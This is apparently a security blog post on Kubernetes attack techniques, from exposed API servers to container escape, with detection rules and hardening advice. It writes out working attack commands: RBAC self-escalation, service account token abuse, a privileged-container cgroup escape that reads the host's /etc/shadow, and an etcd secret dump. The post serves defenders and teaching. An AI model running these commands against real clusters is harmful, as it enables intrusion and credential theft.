Kubernetes Attack Techniques in 2025: From Initial Access to Cluster Takeover
Overview
Kubernetes has become the default substrate for cloud-native workloads, and with that ubiquity comes attacker attention. In 2024 and 2025, Kubernetes-targeting campaigns have grown in both volume and sophistication — from opportunistic cryptomining via exposed API servers to targeted intrusions where K8s clusters serve as pivot points into broader cloud environments.
This post walks through the major attack paths observed in current campaigns and research, paired with detection logic and hardening guidance. The aim is not to provide a deployment guide for attackers, but to give security teams and platform engineers a realistic picture of where clusters are commonly compromised.
Attack Surface Overview
A Kubernetes cluster exposes several distinct attack surfaces:
- Kubernetes API server: The control plane endpoint — the most sensitive interface in the cluster
- Kubelet API: Per-node agent API, often accessible on port 10250
- etcd: The key-value store holding all cluster state, including secrets
- Container runtime: The interface through which containers can be escaped to the host
- Service account tokens: Credentials automatically mounted into pods
- Helm/GitOps pipelines: CI/CD paths that deploy workloads with cluster-wide privileges
Attackers who breach any of these surfaces can typically move to others — the interconnected trust relationships within a cluster mean that compromise of one component often enables pivot to higher privilege.
Technique 1: Exposed Kubernetes API Server
Discovery
The Kubernetes API server listens on port 6443 by default. Misconfigured clusters with --anonymous-auth=true and permissive RBAC bindings for the system:anonymous or system:unauthenticated groups allow unauthenticated enumeration and sometimes full cluster access.
Shodan and Censys regularly index thousands of exposed API servers. Standard tooling can enumerate these directly: kubectl against the API server, and kubelet-focused tools like kubeletctl against the kubelet API.
# Check if anonymous access is permitted
curl -sk https://<api-server>:6443/api/v1/namespaces
# If it returns namespace data without authentication,
# the cluster has anonymous access enabled with permissive RBAC
# List pods across all namespaces anonymously
kubectl --server=https://<api-server>:6443 \
--insecure-skip-tls-verify \
get pods --all-namespaces
Hardening
# kube-apiserver flags — disable anonymous auth
--anonymous-auth=false
# Audit RBAC bindings for anonymous/unauthenticated subjects
kubectl get clusterrolebindings -o json | \
jq '.items[] | select(any(.subjects[]?;
    .name == "system:anonymous" or .name == "system:unauthenticated"))'
Technique 2: RBAC Misconfiguration and Privilege Escalation
Overprivileged Service Accounts
Service accounts are frequently over-provisioned. Common misconfigurations include:
- Binding the cluster-admin role to application service accounts
- Granting create/update permissions on rolebindings or clusterrolebindings (allows self-escalation)
- Granting get/list permissions on secrets cluster-wide (exposes all secrets, including other service account tokens)
- Granting pods/exec or pods/attach (allows an interactive shell in any pod)
Privilege Escalation via RBAC
If a service account can create RoleBindings, it can grant itself additional permissions:
# An attacker with 'create rolebindings' permission can escalate:
kubectl create rolebinding attacker-admin \
--clusterrole=cluster-admin \
--serviceaccount=default:compromised-sa \
--namespace=kube-system
Detection
# Audit for cluster-admin bindings (highest risk)
kubectl get clusterrolebindings,rolebindings --all-namespaces -o json | \
jq '.items[] | select(.roleRef.name == "cluster-admin") |
{name: .metadata.name, subjects: .subjects}'
# Find service accounts with secrets list/get permissions
kubectl auth can-i list secrets --as=system:serviceaccount:default:my-sa \
--all-namespaces
Technique 3: Service Account Token Abuse
Automatic Token Mounting
By default, Kubernetes mounts a service account token into every pod at /var/run/secrets/kubernetes.io/serviceaccount/token. If an attacker achieves code execution inside a container — through a web application vulnerability, for example — they can read this token and use it to authenticate to the API server.
# From inside a compromised container:
TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
APISERVER=https://kubernetes.default.svc
CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
# Query the API server with the mounted token
curl --cacert $CACERT \
-H "Authorization: Bearer $TOKEN" \
$APISERVER/api/v1/namespaces/default/secrets
If the compromised pod's service account has broad permissions, this gives the attacker direct API access from inside the cluster.
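The data fields in the API response are base64-encoded, not encrypted, so recovering plaintext is a one-liner. A minimal sketch (the encoded string is an illustrative stand-in, not a real credential):

```shell
# Secret values in API responses are base64-encoded; decoding is trivial.
# "cGFzc3dvcmQxMjM=" is an illustrative stand-in value.
encoded="cGFzc3dvcmQxMjM="
echo "$encoded" | base64 -d
# prints: password123
```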
Hardening
# Disable automatic token mounting for pods that don't need API access
apiVersion: v1
kind: ServiceAccount
metadata:
name: my-app-sa
automountServiceAccountToken: false
# Or at the pod level
spec:
automountServiceAccountToken: false
Technique 4: Container Escape Techniques
Privileged Container Escape
A container running with securityContext.privileged: true has effectively no isolation from the host. A classic escape abuses the cgroup v1 release_agent mechanism, which executes an attacker-controlled script on the host when a cgroup's last process exits:
# Inside a privileged container — escape to host filesystem
# Create a cgroup that triggers a host write on release
mkdir /tmp/cgroup_escape && mount -t cgroup -o memory cgroup /tmp/cgroup_escape
mkdir /tmp/cgroup_escape/x
echo 1 > /tmp/cgroup_escape/x/notify_on_release
# The sed pattern '\perdir=' matches "upperdir=", the overlayfs upper
# directory (this container's root filesystem as seen from the host)
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > /tmp/cgroup_escape/release_agent
echo '#!/bin/sh' > /cmd
echo "cat /etc/shadow > $host_path/output" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgroup_escape/x/cgroup.procs"
# Result: /etc/shadow from the host is now accessible
This technique requires no CVE — it uses the intended behavior of privileged containers.
hostPath Mount Abuse
Mounting the host filesystem into a container via hostPath volumes gives read/write access to host files:
# Dangerous pod spec — mounts entire host filesystem
volumes:
- name: host-root
hostPath:
path: /
type: Directory
An attacker who can create pods with this spec can read host credentials, SSH keys, kubeconfig files, and cloud provider metadata endpoints.
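Defenders can sweep for pods that mount hostPath volumes with jq. The sketch below runs the filter against a minimal inline sample document; in a live cluster you would pipe kubectl get pods -A -o json into the same filter.

```shell
# List pods that mount hostPath volumes. In a live cluster, feed this
# filter from: kubectl get pods -A -o json
# A minimal sample document is inlined here for illustration.
jq -r '.items[]
       | select(.spec.volumes[]?.hostPath != null)
       | "\(.metadata.namespace)/\(.metadata.name)"' <<'EOF'
{"items":[
  {"metadata":{"namespace":"default","name":"safe-pod"},
   "spec":{"volumes":[{"name":"cfg","configMap":{"name":"app"}}]}},
  {"metadata":{"namespace":"kube-system","name":"host-root-pod"},
   "spec":{"volumes":[{"name":"host-root","hostPath":{"path":"/"}}]}}
]}
EOF
# prints: kube-system/host-root-pod
```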
CVE-2024-21626: runc Container Escape
In January 2024, CVE-2024-21626 was disclosed in runc, the low-level container runtime used by most Kubernetes distributions. A file descriptor referencing the host filesystem was leaked into the container's process during setup; a crafted image could set its working directory to that descriptor under /proc/self/fd/ and break out to the host filesystem.
The vulnerability required only the ability to run a container with a malicious image — no elevated privileges within the container were needed.
Mitigation: Update runc to 1.1.12 or later; update container runtime (containerd, CRI-O) to versions incorporating the fix.
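A quick way to check whether a node's runc is patched is a version comparison with sort -V. The installed version below is hard-coded as an assumption for illustration; on a real node, read it from runc --version.

```shell
# Compare an installed runc version against the patched 1.1.12 release.
# $installed is a hard-coded stand-in; on a node, obtain it with:
#   runc --version | awk 'NR==1 {print $3}'
patched="1.1.12"
installed="1.1.11"
oldest=$(printf '%s\n%s\n' "$installed" "$patched" | sort -V | head -n1)
if [ "$oldest" = "$installed" ] && [ "$installed" != "$patched" ]; then
  echo "runc $installed is vulnerable to CVE-2024-21626"
else
  echo "runc $installed includes the fix"
fi
```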
Technique 5: etcd Access for Secret Extraction
etcd stores all Kubernetes cluster state, including Secret objects. Secrets are only base64-encoded (an encoding, not encryption), so unless encryption at rest is configured they sit in etcd effectively in plaintext. Direct etcd access also bypasses all RBAC controls.
etcd typically listens on ports 2379 (client) and 2380 (peer). If it is reachable without authentication, or with client certificate authentication where the attacker has obtained a valid client certificate, all cluster secrets can be extracted:
# If etcd is accessible (2379) with client certs:
ETCDCTL_API=3 etcdctl \
--endpoints=https://<etcd-host>:2379 \
--cacert=/etc/kubernetes/pki/etcd/ca.crt \
--cert=/etc/kubernetes/pki/etcd/server.crt \
--key=/etc/kubernetes/pki/etcd/server.key \
get /registry/secrets --prefix | strings
# This dumps all secrets from the cluster in readable form
Mitigation: Enable encryption at rest (EncryptionConfiguration) so secrets are encrypted before being written to etcd, and network-isolate etcd so it is reachable only from the API server.
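A minimal EncryptionConfiguration sketch, passed to the API server via --encryption-provider-config. The key material shown is a placeholder and must be replaced with a real base64-encoded 32-byte key:

```yaml
# Minimal sketch: encrypt Secrets with AES-CBC before they reach etcd.
# The identity provider stays last so existing plaintext data remains
# readable until it is rewritten under the new key.
apiVersion: apiserver.config.k8s.io/v1
kind: EncryptionConfiguration
resources:
  - resources: ["secrets"]
    providers:
      - aescbc:
          keys:
            - name: key1
              secret: <base64-encoded 32-byte key>   # placeholder
      - identity: {}
```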
Detection Framework
Audit Logging
Enable Kubernetes audit logging — it is disabled by default. Audit logs capture every API server request and are essential for detecting malicious behavior post-compromise.
# Audit policy — log sensitive operations
apiVersion: audit.k8s.io/v1
kind: Policy
rules:
- level: RequestResponse
resources:
- group: ""
resources: ["secrets", "serviceaccounts/token"]
- level: Request
verbs: ["create", "delete", "patch"]
resources:
- group: "rbac.authorization.k8s.io"
resources: ["clusterrolebindings", "rolebindings"]
- level: Metadata
resources:
- group: ""
resources: ["pods/exec", "pods/attach"]
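Once audit events are flowing, suspicious secret access can be hunted with jq. The sketch below runs the filter over two inline sample events; in practice, point it at the file configured by --audit-log-path.

```shell
# Flag secret reads by non-system identities in a JSON-lines audit log.
# Two sample events are inlined for illustration; in practice read from
# the file set by --audit-log-path.
jq -r 'select(.objectRef.resource == "secrets"
              and (.user.username | startswith("system:") | not))
       | "\(.user.username) \(.verb) \(.objectRef.namespace)/\(.objectRef.name)"' <<'EOF'
{"user":{"username":"system:kube-controller-manager"},"verb":"get","objectRef":{"resource":"secrets","namespace":"kube-system","name":"ca-token"}}
{"user":{"username":"alice"},"verb":"get","objectRef":{"resource":"secrets","namespace":"default","name":"db-creds"}}
EOF
# prints: alice get default/db-creds
```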
Runtime Detection with Falco
Falco is an open-source runtime security tool for Kubernetes that detects anomalous container behavior:
# Falco rule: detect shell spawned inside container
- rule: Terminal shell in container
desc: A shell was spawned in a container — possible interactive session
condition: >
spawned_process and container and
shell_procs and proc.tty != 0 and
not user_expected_terminal_shell_in_container_conditions
output: >
A shell was spawned in a container (user=%user.name container=%container.name
image=%container.image.repository shell=%proc.name parent=%proc.pname)
priority: WARNING
# Falco rule: detect read of service account token
- rule: Read service account token
desc: A process read the service account token file
condition: >
open_read and
fd.name startswith /run/secrets/kubernetes.io/serviceaccount and
not proc.name in (known_sa_readers)
output: >
Service account token read (proc=%proc.name pid=%proc.pid
container=%container.name)
priority: WARNING
Hardening Checklist
| Control | Implementation |
|---|---|
| Disable anonymous API access | --anonymous-auth=false on API server |
| Enable audit logging | Configure --audit-policy-file and --audit-log-path |
| Enforce Pod Security Standards | Use PodSecurity admission controller (Restricted profile) |
| Disable auto token mounting | automountServiceAccountToken: false on ServiceAccounts |
| Encrypt secrets at rest | Configure EncryptionConfiguration for etcd |
| Network-isolate etcd | Allow port 2379/2380 only from API server IPs |
| Enable RBAC | Ensure --authorization-mode includes RBAC (typically Node,RBAC) |
| Audit RBAC bindings regularly | Review cluster-admin bindings and wildcard permissions |
| Deploy runtime detection | Install Falco or equivalent on all nodes |
| Use network policies | Default-deny all ingress/egress; allow only required flows |
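The default-deny entry in the checklist translates to a NetworkPolicy like the following sketch (the namespace name is a placeholder); per-application allow rules are then layered on top:

```yaml
# Default-deny all ingress and egress for every pod in the namespace.
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: my-app        # placeholder namespace
spec:
  podSelector: {}          # empty selector matches all pods in the namespace
  policyTypes: ["Ingress", "Egress"]
```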
Conclusion
Kubernetes clusters are complex systems with multiple interacting trust boundaries. The attack paths described here — from anonymous API access to container escape — are not theoretical. They appear in real incident reports and red team assessments regularly.
The most impactful hardening investments are: disabling anonymous access, enforcing least-privilege RBAC, enabling audit logging, and deploying a runtime detection tool like Falco. Clusters that lack these fundamentals are not hardened against the attack patterns that active campaigns use today.
Security teams should also treat Kubernetes RBAC audits as a recurring operational task, not a one-time configuration step. Permissions accumulate over time as applications and teams evolve, and the gap between intended and actual privilege grows quietly until an attacker finds it first.